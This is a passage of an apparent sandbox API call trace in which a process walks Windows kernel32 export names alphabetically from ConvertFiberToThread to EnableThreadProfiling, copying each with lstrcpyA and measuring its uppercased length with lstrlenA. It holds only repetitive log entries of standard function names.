[0085.612] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.612] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.612] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.612] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.613] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.613] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.613] lstrlenA (lpString="COPYFILEA") returned 9 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.613] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.613] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.613] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.613] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.613] lstrlenA (lpString="COPYFILEW") returned 9 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.613] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.613] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.613] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.613] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.613] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.613] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.613] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.613] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.613] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.613] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.613] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.614] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.614] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.614] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.614] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.614] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.614] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.614] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.614] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.614] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.614] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.614] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.614] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.614] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.614] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.614] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.614] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.614] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.614] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.614] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.614] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.615] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.615] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.615] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.615] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.615] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.615] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.615] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.615] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.615] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.615] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.615] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.615] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.615] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.615] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.615] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.615] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.615] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.615] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.615] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.616] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.616] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.616] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.616] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.616] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.616] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.616] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.616] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.616] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.616] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.616] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.616] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.616] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.616] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.616] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.616] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.616] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.616] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.617] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.617] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.617] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.617] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.617] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.617] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.617] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.617] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.617] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.617] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.617] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.617] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.617] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.617] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.617] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.617] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.617] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.617] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.617] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.618] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.618] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.618] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.618] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.618] lstrlenA (lpString="DELETEATOM") returned 10 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.618] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.618] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.618] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.618] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.618] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.618] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.618] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.618] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.618] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.618] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.618] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.618] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.618] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.619] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.619] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.619] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.619] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.619] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.619] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.619] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.619] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.619] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.619] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.619] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.619] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.619] lstrlenA 